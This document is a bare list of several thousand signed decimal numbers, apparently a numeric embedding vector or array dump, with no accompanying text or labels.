0.016999613493680954, 0.0033383804839104414, 0.0059761847369372845, 0.030469253659248352, -0.009513900615274906, 0.009297147393226624, -0.01150338165462017, 0.010140934959053993, -0.006011019926518202, -0.004815008956938982, -0.007690854370594025, 0.004176362417638302, -0.02833268977701664, -0.00811274815350771, -0.007365725003182888, 0.00999385304749012, 0.007427654694765806, 0.012215569615364075, -0.022619703784585, -0.004575032740831375, -0.019012318924069405, -0.0025100749917328358, -0.0025139455683529377, -0.014003779739141464, -0.010148676112294197, -0.0007552480674348772, -0.027341820299625397, 0.027171513065695763, 0.023130621761083603, -0.004207327030599117, -0.012788415886461735, -0.019801918417215347, -0.006723207887262106, 0.023393820971250534, 0.05533389747142792, -0.026738008484244347, 0.00013208374730311334, 0.007145101670175791, 0.008569477126002312, -0.007776007056236267, -0.006479361094534397, 0.007996630854904652, 0.004331185948103666, 0.010690558701753616, 0.0029706747736781836, 0.007470231037586927, -0.0006715466734021902, -0.001273422734811902, 0.008337242528796196, 0.012943239882588387, 0.02012704685330391, 0.0014601785223931074, 0.00007196870865300298, 0.024477586150169373, -0.0017446666024625301, 0.004180232994258404, 0.045053619891405106, -0.020823752507567406, -0.003975091967731714, -0.014924979768693447, -0.02119532972574234, 0.018052412196993828, 0.01389540359377861, -0.0074160429649055, 0.01443728618323803, -0.014429545029997826, 0.022155234590172768, -0.0035261039156466722, 0.017448602244257927, -0.0015143667114898562, -0.008135971613228321, -0.026397395879030228, -0.008492065593600273, 0.01379476860165596, 0.00952164176851511, 0.00024021824356168509, 0.027883701026439667, 0.012292981147766113, -0.013632203452289104, 0.006850937381386757, -0.0034351451322436333, -0.007210901472717524, 0.018408507108688354, 0.03545456752181053, 0.001681769615970552, -0.015149473212659359, 0.0035648096818476915, 0.021830104291439056, 0.01851688325405121, -0.012416839599609375, 0.002134628128260374, -0.002686186693608761, 0.004145397804677486, 0.01056669931858778, -0.023471234366297722, -0.013717357069253922, -0.02234102226793766, -0.01127114612609148, 0.005275608506053686, 0.012045263312757015, -0.024446621537208557, -0.022650668397545815, -0.018764600157737732, 0.02032831683754921, -0.03694087266921997, -0.004656314849853516, -0.011139546521008015, -0.011828511022031307, -0.019430341199040413, 0.025530384853482246, 0.055767402052879333, 0.018934907391667366, 0.016736414283514023, 0.004973703064024448, -0.020916646346449852, 0.04152364656329155, -0.010992464609444141, 0.011851734481751919, -0.020622482523322105, 0.01795951835811138, 0.006131008267402649, 0.008035336621105671, 0.021117916330695152, 0.036631226539611816, 0.034494660794734955, 0.02726440690457821, -0.0064600082114338875, -0.007996630854904652, 0.006227772682905197, 0.02220168150961399, 0.012711004354059696, -0.02495753765106201, -0.004756950307637453, 0.02361057512462139, 0.024044079706072807, -0.009831288829445839, -0.008159195072948933, 0.009297147393226624, -0.02941645309329033, -0.0006686437409371138, 0.006034243386238813, -0.023502198979258537, 0.03526877984404564, 0.04124496504664421, -0.009707429446280003, 0.007025113794952631, 0.0010682817082852125, 0.00268425140529871, -0.07028984278440475, -0.021953964605927467, -0.05192778259515762, 0.0030732452869415283, 0.004381503444164991, -0.020421212539076805, -0.008654629811644554, 0.01534300297498703, 0.0020204458851367235, -0.022108787670731544, -0.01096924114972353, -0.011805287562310696, 0.006905125454068184, 0.003357733367010951, 0.009010723792016506, -0.012200087308883667, -0.021350152790546417, 0.028301725164055824, -0.027372784912586212, 0.005856196396052837, 0.006196808069944382, -0.012749710120260715, 0.014901756308972836, 0.00662644300609827, 0.03344186395406723, -0.0199102945625782, -0.016302907839417458, -0.028642335906624794, -0.034092120826244354, 0.005113044288009405, -0.0020107694435864687, -0.007346372120082378, -0.017402155324816704, -0.005093690939247608, 0.003092598170042038, 0.002999704098328948, -0.0064600082114338875, 0.006719337310642004, -0.02907584235072136, 0.006572254933416843, 0.00007892366556916386, -0.015288814902305603, -0.0022991281002759933, -0.028626853600144386, 0.009986111894249916, 0.018764600157737732, 0.014414061792194843, 0.0020688283257186413, 0.008848159573972225, 0.03477334603667259, -0.02732633799314499, -0.016256460919976234, 0.038179460912942886, -0.030871793627738953, -0.004257644526660442, 0.013376745395362377, 0.002829398261383176, -0.017851142212748528, -0.010024817660450935, 0.040408916771411896, 0.0020997929386794567, -0.012966463342308998, 0.0011147287441417575, 0.01696864888072014, 0.005674278829246759, 0.008732042275369167, -0.0011244051856920123, 0.007505066227167845, -0.007632795721292496, 0.014623073861002922, -0.0037893035914748907, 0.022619703784585, -0.04214293882250786, -0.010086746886372566, -0.002686186693608761, -0.007590218912810087, -0.008360465988516808, -0.017789212986826897, -0.00034399834112264216, 0.0020301223266869783, 0.037529200315475464, 0.0044821384362876415, 0.00897975917905569, -0.015993261709809303, 0.009823547676205635, 0.017587943002581596, -0.007950183935463428, -0.011859475634992123, 0.010992464609444141, 0.0025526515673846006, 0.0016527401749044657, 0.020808270201086998, -0.021907515823841095, 0.021102434024214745, -0.02483367919921875, -0.02509688027203083, -0.012974204495549202, -0.029385488480329514, 0.03138270974159241, -0.01878008246421814, -0.006429043132811785, -0.0033287040423601866, -0.0015433961525559425, -0.02463240921497345, 0.011611757799983025, 0.007334760390222073, -0.006707725580781698, -0.033472828567028046, -0.012269757688045502, -0.009335853159427643, -0.025669725611805916, -0.04037795215845108, 0.004133785609155893, 0.0009787743911147118, 0.03403019160032272, -0.015915850177407265, -0.0009676464833319187, 0.0036073862574994564, -0.001198914018459618, -0.0016217755619436502, -0.00001941340815392323, -0.006777395959943533, -0.030391840264201164, 0.013949591666460037, 0.02786821871995926, 0.0027887572068721056, -0.005008538253605366, 0.0040176683105528355, -0.012741968967020512, -0.0256387609988451, 0.03944901376962662, -0.011077617295086384, -0.0012850345810875297, 0.009869994595646858, 0.014994650147855282, 0.01265681628137827, 0.029757065698504448, -0.00214623985812068, 0.027032172307372093, 0.0007794392295181751, -0.016395801678299904, -0.004857585299760103, 0.005589126143604517, 0.028502995148301125, -0.01554427295923233, -0.010891828685998917, -0.023409303277730942, 0.005132397171109915, 0.027001207694411278, -0.0012850345810875297, 0.027620501816272736, 0.006521937437355518, -0.01177432294934988, 0.029896406456828117, 0.007265090011060238, 0.017200883477926254, -0.05192778259515762, -0.0031932333949953318, -0.00786115974187851, 0.00006465088517870754, 0.025793585926294327, 0.007636666297912598, 0.0034254686906933784, 0.027635984122753143, 0.019012318924069405, -0.006556772626936436, 0.0012211698340252042, -0.001338255126029253, -0.006262608338147402, -0.014692744240164757, 0.011867216788232327, -0.0026590926572680473, -0.008128230459988117, -0.005174973513931036, 0.03396826237440109, -0.023997632786631584, -0.017278295010328293, 0.0038860682398080826, -0.018207237124443054, 0.008221124298870564, 0.0071644545532763, -0.008824936114251614, 0.013601238839328289, -0.0031990392599254847, -0.029431935399770737, 0.00654516089707613, 0.010992464609444141, 0.00509756151586771, 0.018609777092933655, 0.006049725692719221, 0.006541290320456028, -0.001962387003004551, -0.0282552782446146, -0.020235422998666763, -0.006893513724207878, -0.00008164517203113064, -0.003537715645506978, -0.02509688027203083, 0.01757246069610119, -0.014150862582027912, -0.01675189658999443, -0.0011224698973819613, -0.023455750197172165, -0.01106987614184618, 0.008453359827399254, -0.01032672356814146, 0.014522438868880272, 0.007292184047400951, 0.003725439077243209, 0.023331891745328903, 0.008685595355927944, -0.023068692535161972, 0.014522438868880272, 0.004985314793884754, 0.023904738947749138, 0.006843196228146553, 0.005585255566984415, -0.015079802833497524, -0.017510531470179558, -0.01655062660574913, 0.02919970080256462, 0.002273969352245331, -0.013330298475921154, -0.0010402200277894735, -0.00039915417437441647, -0.019492270424962044, 0.033875368535518646, -0.004803397227078676, -0.010760229080915451, 0.01890394277870655, -0.0010421553160995245, -0.025003984570503235, 0.013167733326554298, -0.005159491207450628, 0.008654629811644554, 0.00037036670255474746, 0.010667335242033005, -0.013608979992568493, 0.0050240205600857735, -0.0019739989656955004, -0.02906036004424095, 0.030438289046287537, 0.015335261821746826, 0.024136973544955254, 0.0010053847217932343, 0.013608979992568493, 0.003866715356707573, -0.012300722301006317, 0.01582295633852482, -0.0006357437232509255, -0.003082921728491783, 0.0090494304895401, -0.00735024269670248, -0.0035686802584677935, 0.011464675888419151, -0.013454156927764416, -0.018733635544776917, 0.005093690939247608, 0.014894015155732632, 0.036909908056259155, -0.029757065698504448, 0.013438674621284008, 0.014963685534894466, -0.004516973625868559, 0.03474238142371178, 0.026211608201265335, 0.01614808477461338, 0.0018530430970713496, -0.02087019942700863, 0.0037428566720336676, -0.0038222037255764008, 0.006409690249711275, -0.02193848229944706, 0.000861205393448472, 0.004540197551250458, -0.004470526706427336, -0.0018685254035517573, 0.006823842879384756, -0.017665354534983635, 0.003349992213770747, 0.010017076507210732, 0.009281665086746216, -0.0034893332049250603, 0.030376357957720757, -0.004180232994258404, -0.006494843401014805, 0.011317593045532703, -0.011263404972851276, 0.010334464721381664, 0.01924455352127552, -0.003038410097360611, -0.0021152752451598644, -0.0018327224534004927, 0.01530429720878601, -0.028177866712212563, 0.026428360491991043, -0.0180988609790802, 0.0024733045138418674, 0.006227772682905197, 0.005805878899991512, -0.01244780421257019, 0.015621685422956944, -0.01789758913218975, 0.009258441627025604, -0.009451971389353275, 0.003711892059072852, -0.010783452540636063, -0.02207782305777073, 0.00038754241541028023, -0.015993261709809303, -0.00753603084012866, 0.0013295463286340237, 0.015931332483887672, -0.006076820194721222, 0.009057171642780304, -0.005999408196657896, 0.007613442838191986, 0.001631452003493905, 0.032884497195482254, 0.014715967699885368, 0.01449921540915966, 0.01511076744645834, 0.023595092818140984, -0.015567496418952942, -0.008654629811644554, -0.01628742553293705, -0.008933312259614468, 0.0036693154834210873, 0.005372373387217522, 0.02336285635828972, 0.011704651638865471, 0.014297944493591785, -0.006676760967820883, -0.009583570994436741, 0.0036073862574994564, 0.008662371896207333, -0.015157214365899563, 0.020142529159784317, 0.003990574274212122, -0.005662667099386454, 0.0025294278748333454, 0.017340226098895073, -0.009103618562221527, 0.010922793298959732, -0.0048962910659611225, 0.022248128429055214, 0.016720931977033615, -0.0073966896161437035, 0.000636711367405951, -0.0006807392928749323, -0.002941645449027419, -0.026211608201265335, 0.00735024269670248, -0.009846771135926247, 0.009784840978682041, -0.0033751509618014097, -0.018145307898521423, 0.006057466845959425, 0.006823842879384756, -0.02025090530514717, -0.004331185948103666, -0.007075431291013956, 0.0009957082802429795, 0.009359076619148254, 0.0049001616425812244, -0.007381207309663296, -0.019554199650883675, 0.019399376586079597, -0.00582136120647192, 0.011193734593689442, -0.02147401124238968, 0.020235422998666763, -0.02179913967847824, 0.015637166798114777, -0.03282256796956062, 0.004396985750645399, 0.0008795906906016171, 0.006316796410828829, -0.022867422550916672, 0.006370984483510256, -0.03122788853943348, -0.003454498015344143, 0.010682817548513412, -0.017386673018336296, -0.008523030206561089, -0.008894606493413448, -0.020761823281645775, -0.012610369361937046, 0.01642676629126072, 0.0041376566514372826, 0.006506455130875111, -0.01127114612609148, 0.004652444273233414, -0.009374558925628662, -0.009328112006187439, 0.005705243907868862, 0.00881719496101141, 0.0006821907591074705, 0.0034622391685843468, -0.001594681409187615, 0.006189066916704178, 0.005697502754628658, -0.004211197607219219, -0.006518066860735416, 0.009916441515088081, 0.002167528262361884, 0.015056579373776913, 0.008855900727212429, 0.014027003198862076, -0.01524236798286438, -0.0004424563667271286, 0.014615332707762718, -0.002231392776593566, 0.019337447360157967, 0.006069079041481018, -0.01422827411442995, -0.011232440359890461, -0.008739783428609371, -0.011627240106463432, 0.01140274666249752, -0.009916441515088081, -0.021489493548870087, -0.008043077774345875, 0.0009342627017758787, -0.007799230981618166, 0.005399467423558235, -0.0002965836611110717, -0.01622549630701542, -0.016519660130143166, -0.013430933468043804, 0.0020185105968266726, -0.012726486660540104, 0.02395118586719036, -0.010884087532758713, -0.0005370437866076827, -0.010257053188979626, -0.0022526809480041265, -0.017944036051630974, 0.007609572261571884, 0.03898454084992409, 0.008824936114251614, -0.03830331936478615, -0.008623665198683739, 0.012935498729348183, -0.024245351552963257, -0.006119396537542343, -0.0005622025928460062, 0.0010702169965952635, 0.021148880943655968, 0.016117120161652565, -0.00481113838031888, 0.0023300927132368088, -0.031475603580474854, -0.00034472407423891127, 0.029370006173849106, 0.007957925088703632, -0.0032919333316385746, -0.00840691290795803, 0.010574440471827984, 0.0013895403826609254, 0.014932720921933651, 0.008747524581849575, -0.012254275381565094, 0.009808064438402653, 0.01636483706533909, 0.009320370852947235, 0.009916441515088081, 0.0014843697426840663, 0.016039708629250526, -0.0007804068736732006, 0.0027036042883992195, -0.021025022491812706, 0.009599053300917149, 0.0006430011126212776, -0.02893650159239769, 0.017727283760905266, 0.009111359715461731, -0.01944582350552082, -0.004462785553187132, -0.0018723959801718593, -0.0015608137473464012, 0.019368411973118782, -0.011658204719424248, 0.019616128876805305, 0.004327314905822277, 0.013709615916013718, 0.022650668397545815, -0.011232440359890461, -0.026892831549048424, -0.042824164032936096, -0.013608979992568493, 0.0032358099706470966, 0.008724301122128963, 0.019399376586079597, -0.004396985750645399, 0.008135971613228321, 0.006556772626936436, 0.011247922666370869, 0.0039596096612513065, 0.017138954252004623, 0.008941053412854671, 0.0007267025066539645, 0.01602422632277012, 0.007710207253694534, 0.021566905081272125, 0.0035667449701577425, 0.002167528262361884, -0.0022991281002759933, -0.012339428067207336, 0.014917238615453243, -0.0038841329514980316, -0.02336285635828972, 0.010589923709630966, -0.010001594200730324, -0.009312629699707031, -0.001550169661641121, -0.022464880719780922, -0.012958722189068794, -0.008492065593600273, 0.005445914342999458, -0.029849959537386894, -0.011418228968977928, -0.01393410935997963, -0.010814417153596878, -0.006719337310642004, 0.0025565221440047026, -0.0072883134707808495, -0.015219144523143768, -0.021164365112781525, -0.0016556431073695421, 0.017138954252004623, 0.002057216363027692, -0.010373170487582684, 0.004323444329202175, -0.012532957829535007, -0.006808360572904348, -0.008391430601477623, -0.01783565990626812, 0.006893513724207878, 0.003007445251569152, 0.0035531979519873857, -0.002492657396942377, -0.0033441863488405943, 0.02181462198495865, 0.011782064102590084, 0.002169463550671935, 0.00113601703196764, 0.015397191047668457, 0.012192346155643463, -0.006239384412765503, -0.02073085866868496, 0.004652444273233414, 0.01207622792571783, -0.007400560192763805, 0.00939004123210907, -0.004218938760459423, -0.038798753172159195, -0.0031506570521742105, 0.006881901994347572, -0.007296054624021053, -0.01319095678627491, 0.0026107102166861296, 0.006537419743835926, 0.04502265527844429, 0.0022159104701131582, 0.030097676441073418, -0.009211994707584381, -0.000025204168196069077, 0.012153640389442444, 0.0007939539500512183, -0.013245144858956337, -0.007009631022810936, 0.00044463356607593596, 0.018207237124443054, -0.0017620843136683106, -0.011201475746929646, 0.005763302557170391, -0.016659002751111984, -0.00652580801397562, -0.015234626829624176, -0.0065141962841153145, -0.020034153014421463, 0.026614150032401085, 0.008035336621105671, 0.010752487927675247, 0.010040299966931343, -0.0030751805752515793, -0.0006962216575630009, 0.00398670369759202, 0.001247296342626214, -0.006405819673091173, 0.004187974147498608, 0.011557569727301598, 0.015830697491765022, 0.021892033517360687, 0.01443728618323803, -0.00850754790008068, 0.025329114869236946, 0.01878008246421814, 0.001297613955102861, -0.015791991725564003, -0.014986908994615078, -0.013639944605529308, -0.011263404972851276, 0.005751690827310085, 0.010404135100543499, 0.017928553745150566, 0.01572231948375702, -0.013392227701842785, 0.010497028939425945, -0.019739989191293716, 0.004037021193653345, 0.004749209154397249, 0.00840691290795803, -0.0028332688380032778, 0.011317593045532703, 0.0017253137193620205, 0.0074121723882853985, -0.008453359827399254, 0.004396985750645399, 0.005453655496239662, 0.014654038473963737, -0.006022631656378508, 0.005651055369526148, 0.003709956770762801, -0.0007175098871812224, -0.010024817660450935, -0.007176066283136606, -0.008515289053320885, 0.0017553106881678104, 0.013144509866833687, -0.0023939574602991343, -0.0020185105968266726, 0.00901846494525671, 0.013500603847205639, 0.016473213210701942, 0.010512511245906353, 0.0033306393306702375, -0.0037505978252738714, -0.009134583175182343, 0.03008219413459301, 0.02751212567090988, 0.012378133833408356, -0.01275745127350092, 0.014832085929811, -0.017851142212748528, -0.005747820250689983, 0.017603425309062004, 0.023300927132368088, -0.02248036302626133, -0.0004656798846554011, -0.0040718563832342625, 0.004725985694676638, 0.007067690137773752, -0.0023842810187488794, 0.029958335682749748, -0.005643314216285944, 0.008453359827399254, 0.008314019069075584, 0.009978370741009712, -0.007745042443275452, 0.012401357293128967, -0.0056897616013884544, -0.012494251132011414, 0.004319573752582073, 0.006011019926518202, -0.028828123584389687, 0.0002936806995421648, 0.00654516089707613, 0.0068741608411073685, -0.03128981590270996, -0.0012231051223352551, 0.00864688865840435, -0.018269166350364685, 0.012974204495549202, 0.010017076507210732, -0.011495640501379967, 0.008205641992390156, -0.006908996030688286, -0.006761913653463125, 0.0034854626283049583, -0.007257348857820034, 0.00871655996888876, 0.0057981377467513084, -0.008035336621105671, 0.0008597539272159338, 0.002635868964716792, 0.017990482971072197, 0.007663760334253311, 0.01420505065470934, -0.007810842711478472, 0.0057400790974497795, 0.00018603003991302103, 0.022155234590172768, 0.009769358672201633, 0.007222513668239117, -0.0037351155187934637, -0.006293572951108217, 0.013338039629161358, -0.02071537636220455, -0.012927757576107979, -0.010086746886372566, -0.010442840866744518, -0.0006623540539294481, 0.0053259264677762985, 0.00014260690659284592, -0.015637166798114777, -0.004989185370504856, -0.004853714723140001, 0.012107192538678646, -0.011983334086835384, -0.029308076947927475, 0.0053801145404577255, 0.0008002436370588839, 0.016055190935730934, -0.0065141962841153145, -0.008252088911831379, 0.007474101614207029, -0.025932926684617996, -0.00915006548166275, 0.00867785420268774, 0.004613738507032394, 0.008267571218311787, -0.01574554294347763, 0.03015960566699505, 0.0002624741173349321, 0.022356504574418068, 0.001564684440381825, 0.012238793075084686, -0.008832677267491817, -0.012316204607486725, -0.011689169332385063, 0.01608615554869175, 0.011921404860913754, -0.026165161281824112, -0.008933312259614468, 0.02495753765106201, 0.00948293600231409, 0.003723503788933158, -0.015830697491765022, -0.0031409806106239557, 0.006367113906890154, 0.017138954252004623, 0.004091209266334772, 0.0008181451121345162, 0.006587737239897251, -0.005500102881342173, 0.02051410637795925, 0.017402155324816704, -0.008894606493413448, 0.0029880923684686422, -0.015002391301095486, 0.014630815014243126, 0.018346577882766724, 0.0006120363832451403, 0.006487102247774601, 0.01952323503792286, 0.0025642632972449064, 0.008770748041570187, 0.005027891136705875, -0.018454954028129578, -0.004849844146519899, -0.016055190935730934, -0.014522438868880272, 0.014475991949439049, 0.009126842021942139, 0.015776509419083595, -0.01857881247997284, 0.0071605839766561985, -0.008933312259614468, -0.027140548452734947, -0.030809864401817322, 0.004288609139621258, 0.024818196892738342, -0.01964709535241127, 0.008933312259614468, -0.007528289686888456, -0.0070522078312933445, 0.005898773204535246, 0.0016846725484356284, 0.017340226098895073, 0.021721728146076202, 0.01140274666249752, 0.01856333017349243, -0.01918262429535389, -0.022108787670731544, -0.0056858910247683525, -0.012362651526927948, -0.007981148548424244, 0.011743358336389065, 0.0006207452388480306, 0.03749823570251465, 0.006239384412765503, -0.011178252287209034, -0.017464084550738335, -0.0019604517146945, 0.015358485281467438, 0.013601238839328289, -0.007187678012996912, -0.006270349491387606, -0.014491474255919456, -0.006262608338147402, 0.012811639346182346, -0.026738008484244347, -0.01127114612609148, 0.020312834531068802, -0.022108787670731544, 0.021117916330695152, 0.014630815014243126, -0.020483141764998436, -0.007586348336189985, 0.015660390257835388, 0.006494843401014805, 0.004323444329202175, 0.013198697939515114, -0.028146902099251747, -0.025205256417393684, 0.010558958165347576, -0.01459985040128231, -0.017077025026082993, -0.019554199650883675, 0.0029726100619882345, -0.017479566857218742, -0.020746340975165367, -0.03607385978102684, 0.02692379616200924, 0.011565310880541801, 0.02065344713628292, -0.017138954252004623, 0.008298536762595177, -0.0014834020985290408, 0.01281938049942255, -0.017340226098895073, 0.0074083018116652966, -0.002866168972104788, 0.0019536782056093216, 0.0016440313775092363, 0.01352382730692625, 0.001499852049164474, -0.029261630028486252, 0.025793585926294327, -0.016535142436623573, -0.002630063099786639, 0.004114432726055384, 0.01898135431110859, -0.0017233784310519695, -0.004702761769294739, 0.02879715897142887, -0.00895653571933508, 0.001884007710032165, 0.02248036302626133, 0.004861455876380205, 0.0023552514612674713, 0.011247922666370869, -0.006134878844022751, -0.005747820250689983, -0.01896587200462818, -0.041554611176252365, 0.0008263700874522328, -0.0073889484629035, -0.0011524669826030731, 0.01884201169013977, -0.022015893831849098, -0.000994740636087954, 0.006498713977634907, -0.017665354534983635, 0.015118508599698544, 0.011193734593689442, 0.02314610406756401, 0.007942442782223225, 0.024322763085365295, 0.009134583175182343, 0.00029343878850340843, -0.001037317095324397, -0.01281938049942255, 0.012037522159516811, -0.0083449836820364, -0.004532456398010254, -0.011325334198772907, 0.012827121652662754, -0.026366431266069412, 0.0013053551083430648, 0.01056669931858778, 0.0006763848941773176, -0.021226294338703156, -0.003030668944120407, -0.003638350870460272, -0.005813620053231716, -0.00452471524477005, 0.005476878955960274, 0.010884087532758713, 0.0025545868556946516, 0.011673687025904655, -0.018408507108688354, -0.011325334198772907, -0.01322966255247593, -0.005894902627915144, 0.0003677056811284274, -0.006254867184907198, -0.04455818608403206, 0.0016033902065828443, -0.0054381731897592545, 0.0046601854264736176, 0.015087543986737728, 0.004695020616054535, -0.01399603858590126, 0.0023397691547870636, -0.0007818583981133997, 0.0011021493701264262, 0.018532365560531616, -0.005523326341062784, 0.009869994595646858, 0.01285808626562357, -0.010396393947303295, 0.002587486756965518, 0.04319573938846588, -0.00212688697502017, 0.021489493548870087, 0.006599348969757557, -0.0036673801951110363, -0.0008195965783670545, 0.006560643203556538, 0.001675963751040399, -0.0004465688543859869, 0.007346372120082378, -0.014445027336478233, -0.007814712822437286, 0.002411375055089593, -0.01083764061331749, -0.01851688325405121, 0.011000205762684345, -0.017804695293307304, -0.0185014009475708, 0.003899615490809083, -0.001477596233598888, -0.0010382847394794226, 0.010109970346093178, 0.004671797156333923, 0.026939278468489647, -0.0071644545532763, 0.01851688325405121, 0.005372373387217522, -0.0029319687746465206, 0.029354523867368698, -0.01703057810664177, 0.010349947027862072, -0.0085462536662817, 0.017200883477926254, -0.004513103049248457, -0.0321723110973835, -0.0027906924951821566, -0.006908996030688286, -0.010706041008234024, -0.018671706318855286, -0.004513103049248457, 0.0197090245783329, 0.010806676000356674, -0.00008231042738771066, -0.003446756862103939, -0.014762414619326591, 0.003317092079669237, 0.001045058248564601, -0.02785273641347885, 0.0025371690280735493, -0.007865030318498611, -0.008840418420732021, -0.0022952575236558914, 0.004520844668149948, -0.01346189808100462, -0.01701509580016136, 0.002953257178887725, -0.01463855616748333, 0.0009062009630724788, -0.0016846725484356284, 0.006893513724207878, 0.0033790215384215117, -0.013941850513219833, -0.011511122807860374, -0.02012704685330391, -0.0018143372144550085, 0.002755857305601239, 0.013067098334431648, 0.03551649674773216, -0.0013247081078588963, -0.005488491151481867, 0.007679242640733719, -0.024106008931994438, 0.03957287222146988, 0.0016382255125790834, -0.012060745619237423, -0.01150338165462017, 0.011162769980728626, 0.015977779403328896, -0.009374558925628662, -0.0021055988036096096, -0.011526605114340782, 0.004849844146519899, 0.010497028939425945, -0.014568885788321495, 0.004466656129807234, 0.0027074748650193214, 0.006111655384302139, -0.000015021199942566454, 0.02374991588294506, 0.0069825369864702225, -0.04449625685811043, 0.022867422550916672, 0.003779627149924636, 0.03827235475182533, -0.0075708660297095776, 0.0014505020808428526, -0.008097265847027302, -0.009475194849073887, 0.005411079153418541, -0.0064561376348137856, 0.01791307143867016, -0.019662577658891678, -0.0014853373868390918, 0.001635322580114007, 0.021210812032222748, -0.00915006548166275, 0.0024829809553921223, -0.002262357622385025, -0.0032145215664058924, 0.013717357069253922, 0.009312629699707031, 0.0027171513065695763, 0.01177432294934988, -0.014824344776570797, 0.012393616139888763, 0.0065683843567967415, 0.027156030759215355, 0.011696910485625267, -0.0009884509490802884, -0.018393024802207947, 0.009924182668328285, 0.009978370741009712, -0.018222719430923462, 0.003762209555134177, -0.014785638079047203, -0.010249312035739422, 0.02435372769832611, -0.0284565482288599, 0.004083468113094568, 0.01741763763129711, -0.02167528122663498, 0.002548780757933855, -0.021086951717734337, 0.001206655171699822, 0.011193734593689442, 0.012292981147766113, -0.004888549912720919, 0.0071644545532763, -0.012865827418863773, -0.0127187455072999, 0.018083378672599792, 0.017138954252004623, -0.02087019942700863, 0.008081783540546894, -0.01952323503792286, -0.004342797677963972, -0.001564684440381825, 0.01600874401628971, 0.003005509963259101, -0.003173880511894822, 0.01288905180990696, 0.024462103843688965, 0.01856333017349243, -0.01530429720878601, 0.005875549744814634, 0.022371986880898476, 0.010752487927675247, -0.0023900868836790323, 0.01036542933434248, -0.013516086153686047, 0.0028042395133525133, 0.006866419687867165, -0.006185196340084076, 0.0170925073325634, 0.003092598170042038, -0.024106008931994438, 0.0154823437333107, -0.012262016534805298, 0.0077566541731357574, 0.025282667949795723, 0.017820177599787712, -0.03985155373811722, 0.01244780421257019, 0.01791307143867016, 0.00499692652374506, 0.0035725508350878954, -0.007717948406934738, 0.00014768705295864493, -0.02227909304201603, -0.013787027448415756, 0.0012743903789669275, 0.0013547050766646862, -0.004865326453000307, -0.008561735972762108, -0.008902347646653652, 0.0009749038727022707, -0.0021172105334699154, -0.027837254106998444, 0.010868605226278305, 0.011263404972851276, 0.010884087532758713, -0.012563922442495823, 0.0016566107515245676, -0.016705449670553207, -0.003127433592453599, 0.005244643893092871, -0.0013905080268159509, -0.0020649575162678957, -0.0021559162996709347, 0.016906719654798508, 0.0004632607742678374, 0.02087019942700863, 0.011789805255830288, -0.00720316031947732, -0.00956034753471613, -0.001380831585265696, -0.015699096024036407, 0.011038911528885365, -0.0060303728096187115, 0.021628834307193756, 0.006115525960922241, -0.003090662881731987, -0.00528334965929389, -0.01403474435210228, 0.003930579870939255, -0.0076482780277729034, -0.0029726100619882345, -0.003975091967731714, 0.004985314793884754, 0.0017824048409238458, 0.0022933222353458405, -0.013856697827577591, 0.015459120273590088, -0.01117051113396883, -0.016117120161652565, 0.01891942508518696, 0.00945971254259348, 0.01856333017349243, 0.004888549912720919, 0.011100840754806995, -0.0005709114484488964, 0.002310739830136299, 0.011859475634992123, -0.012509734369814396, -0.012726486660540104, 0.0166899673640728, 0.0045556798577308655, -0.00895653571933508, 0.014948203228414059, -0.010303500108420849, 0.0029842217918485403, -0.02885909005999565, 0.01538170874118805, 0.012068486772477627, 0.00236492813564837, 0.0028429455123841763, -0.012687780894339085, 0.00145534030161798, 0.005983925890177488, -0.009908700361847878, 0.006243254989385605, -0.019337447360157967, 0.01520366221666336, 0.00999385304749012, 0.007810842711478472, 0.029710618779063225, 0.009978370741009712, -0.026939278468489647, 0.010396393947303295, 0.009436489082872868, 0.000532689387910068, -0.0008534641820006073, -0.005113044288009405, -0.01197559293359518, -0.002862298395484686, 0.027605019509792328, 0.013817992061376572, 0.0027810160536319017, -0.03022153489291668, -0.03272967413067818, -0.012169122695922852, -0.003133239457383752, 0.016473213210701942, 0.018052412196993828, 0.017200883477926254, -0.0018936841515824199, 0.0013982491800561547, -0.015273332595825195, 0.003584162564948201, 0.010009335353970528, -0.0007886319071985781, -0.018656224012374878, -0.01898135431110859, -0.006189066916704178, -0.003924774006009102, 0.007841806858778, -0.0022565515246242285, 0.018485918641090393, 0.01621001400053501, -0.019275518134236336, 0.012602628208696842, -0.015521049499511719, 0.0015772638143971562, 0.008739783428609371, -0.017866624519228935, 0.008298536762595177, 0.01046606432646513, -0.012153640389442444, 0.029091324657201767, -0.0009686141274869442, -0.026629632338881493, 0.013384486548602581, -0.006610960699617863, -0.005581384990364313, -0.0036654449068009853, 0.017448602244257927, -0.004474397283047438, 0.007377336733043194, -0.019275518134236336, -0.036971837282180786, 0.010651852935552597, -0.002090116497129202, -0.001550169661641121, -0.003903486067429185, 0.0009686141274869442, 0.023657022044062614, 0.001495981472544372, 0.0011031170142814517, 0.0033345099072903395, -0.0021984928753226995, -0.03446369618177414, -0.00762118399143219, 0.005627831909805536, -0.011735617183148861, 0.0035125568974763155, 0.017247330397367477, -0.0014892079634591937, 0.0224184338003397, 0.013686392456293106, -0.020421212539076805, 0.004234421066939831, -0.023672504350543022, 0.002680380828678608, 0.019894812256097794, -0.010233829729259014, 0.006854807958006859, -0.007361854426562786, -0.006146490573883057, 0.006189066916704178, -0.010086746886372566, 0.012571663595736027, -0.028224313631653786, -0.016318390145897865, -0.0037912388797849417, -0.00042503871372900903, -0.007617313414812088, -0.001206655171699822, -0.012378133833408356, 0.008515289053320885, 0.005736208520829678, 0.024942055344581604, -0.004497620742768049, 0.006045855116099119, 0.018749117851257324, -0.027837254106998444, -0.015776509419083595, -0.0057400790974497795, 0.0015772638143971562, -0.007067690137773752, -0.006146490573883057, 0.0056897616013884544, 0.00895653571933508, -0.016395801678299904, 0.0031661393586546183, 0.007965666241943836, 0.00018228040426038206, -0.022975798696279526, -0.016720931977033615, -0.005693632178008556, 0.01214589923620224, -0.014522438868880272, 0.02052958868443966, -0.015273332595825195, 0.007477972190827131, 0.014561144635081291, 0.011673687025904655, 0.006370984483510256, 0.003864780068397522, 0.017680836841464043, 0.011998816393315792, 0.00867785420268774, 0.009839029982686043, -0.01103117037564516, -0.012068486772477627, -0.00935133546590805, -0.00788051262497902, -0.0016217755619436502, -0.00006967054650885984, -0.002494592685252428, 0.006123267114162445, -0.0028971335850656033, -0.022325539961457253, -0.010009335353970528, -0.0028990688733756542, 0.007075431291013956, 0.000690415792632848, 0.011805287562310696, -0.01268003974109888, 0.00821338314563036, 0.008159195072948933, -0.0002864233683794737, -0.005178844090551138, -0.00039431595359928906, -0.010675076395273209, 0.006951572373509407, 0.004021538887172937, 0.02893650159239769, -0.004501491319388151, 0.016473213210701942, -0.011139546521008015, 